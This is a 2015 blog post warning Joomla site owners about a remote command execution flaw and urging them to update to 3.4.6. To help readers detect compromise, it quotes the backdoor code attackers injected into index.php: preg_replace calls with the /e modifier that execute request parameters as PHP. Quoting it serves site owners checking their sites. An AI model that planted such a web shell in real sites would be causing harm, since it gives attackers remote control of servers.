There is a serious vulnerability that can be easily exploited and is already in the wild. It affects all versions from 1.5 to 3.4. Details here: Critical 0-day Remote Command Execution Vulnerability in Joomla
If you are using Joomla 3, please update immediately to Joomla 3.4.6.
Update Dec 22, 2015: Joomla 3.4.7 has also just been released. However, Joomla 3.4.7 changed the way session variables are being handled (details here). As such, some of your extensions might no longer work after upgrading to Joomla 3.4.7. Would suggest you update to Joomla 3.4.6 first and do some testing to make sure all extensions are working before you update to Joomla 3.4.7.
How to Check
I have quite a number of friends who are being hit by this.
Some signs of being attacked are as follows. Take at look at your <Joomla_Root_Folder>/index.php
OR <Joomla_Root_Folder>/includes/framework.php
. If you see any of the following in the first few lines of the code, then your site is being hit.
- The following from
<Joomla_Root_Folder>/index.php
: - The following from
<Joomla_Root_Folder>/includes/framework.php
:
<?php
if (isset($_REQUEST["gf"])) {/*xncVpILmY*/@preg_replace('/(.*)/e', @$_REQUEST['gf'], '');}
if (isset($_REQUEST["Ix"])) {@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}
if (isset($_REQUEST["Ps"])) {/*CzwNjYUj*/@preg_replace('/(.*)/e', @$_REQUEST['Ps'], '');/*wEKRfiiQ*/}
if (isset($_REQUEST["Ix"])) {/*NemlUoamst*/@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}
if (isset($_REQUEST["LyYE"])) {@preg_replace('/(.*)/e', @$_REQUEST['LyYE'], '');}
/**
* @package Joomla.Site
*
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
<?php if(stripos($_SERVER["HTTP_USER_AGENT"], "JDatabaseDriverMysqli") !== false || stripos($_SERVER["HTTP_X_FORWARDED_
FOR"], "JDatabaseDriverMysqli") !== false) exit;
/**
* @package Joomla.Site
*
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
How to Update
Please apply the following patch immediately:
- Joomla 3 and above: Joomla 3.4.6.
- Old (unsupported) versions 1.5.x and 2.5.x: You may apply the security hotfixes here. This article from OSTraining explains how to apply them.
Update Dec 22, 2015: Joomla 3.4.7 has also just been released. However, Joomla 3.4.7 changed the way session variables are being handled (details here). As such, some of your extensions might no longer work after upgrading to Joomla 3.4.7. Would suggest you update to Joomla 3.4.6 first and do some testing to make sure all extensions are working before you update to Joomla 3.4.7.
Comments
Yes, it's actually quite "scary" to see so many files being changed. But no worries, if you have a full backup some time before Dec 10, restore the whole site and update your Joomla to 3.4.6, it should be fine.
Warm Regards,
/kksou
RSS feed for comments to this post